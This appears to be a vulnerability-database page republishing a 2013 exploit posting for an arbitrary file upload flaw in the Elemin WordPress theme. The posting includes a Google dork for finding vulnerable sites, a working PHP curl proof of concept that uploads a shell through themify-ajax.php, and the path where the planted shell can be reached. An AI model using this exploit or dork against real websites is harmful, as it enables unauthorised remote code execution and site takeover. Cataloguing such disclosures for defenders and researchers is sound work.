Lucene search
K

WordPress Elemin Shell Upload

🗓️ 23 Nov 2013 00:00:00Reported by ReC0dedType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 34 Views

Wordpress Elemin shell upload vulnerability by ReC0ded in themify theme allows arbitrary file upload via themify-ajax.php, leading to remote code execution

Code
`Exploit Title : Wordpress Themes Elemin Arbitrary File Upload Vulnerability  
#Author : ReC0ded  
#Vendor : http://themify.me/  
#Download : http://themify.me/themes/Elemin  
#Date : 22, November 2013.  
#Type : php, html, htm, asp, etc.  
#Category : Web Applications  
#Vulnerability : File Upload  
#Tested On : Windows 7 32-bit | Google Chrome  
  
#Dork : inurl:/wp-content/themes/elemin/ | USE YOUR BRAIN =))  
  
#Exploit : http://victim/[PATH]/wp-content/themes/elemin/themify/themify-ajax.php  
  
#POC :   
  
<?php  
$uploadfile="ReC0ded.php";  
$ch = curl_init("http://victim/[PATH]/wp-content/themes/elemin/themify/themify-ajax.php?upload=1");  
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS,  
array('Filedata'=>"@$uploadfile"));  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  
$postResult = curl_exec($ch);  
curl_close($ch);  
print "$postResult";  
?>  
  
#Results See Your Shell On : http://victim/[PATH]/wp-content/themes/elemin/uploads/{YOUR_FILE}.php  
  
#################### Say Yes ####################  
$Greetz To : ./Newbie-Security ./Malang Cyber Crew ./Hacker Newbie ./Binus Hacker ./Indonesian Cyber Army ./Indonesian Security Down ./Indonesian Figther Cyber ./Devilzc0de ./Surabaya Blackhat  
$Thanks To : ./All Member Newbie-Security Team We Loved ./DevilScreaM ./ShadoWNamE ./grub_err0r ./R3dh34d ./ice-cream ./win32conficker ./HMBP-02 ./Mr.Alf1anz ./casper  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation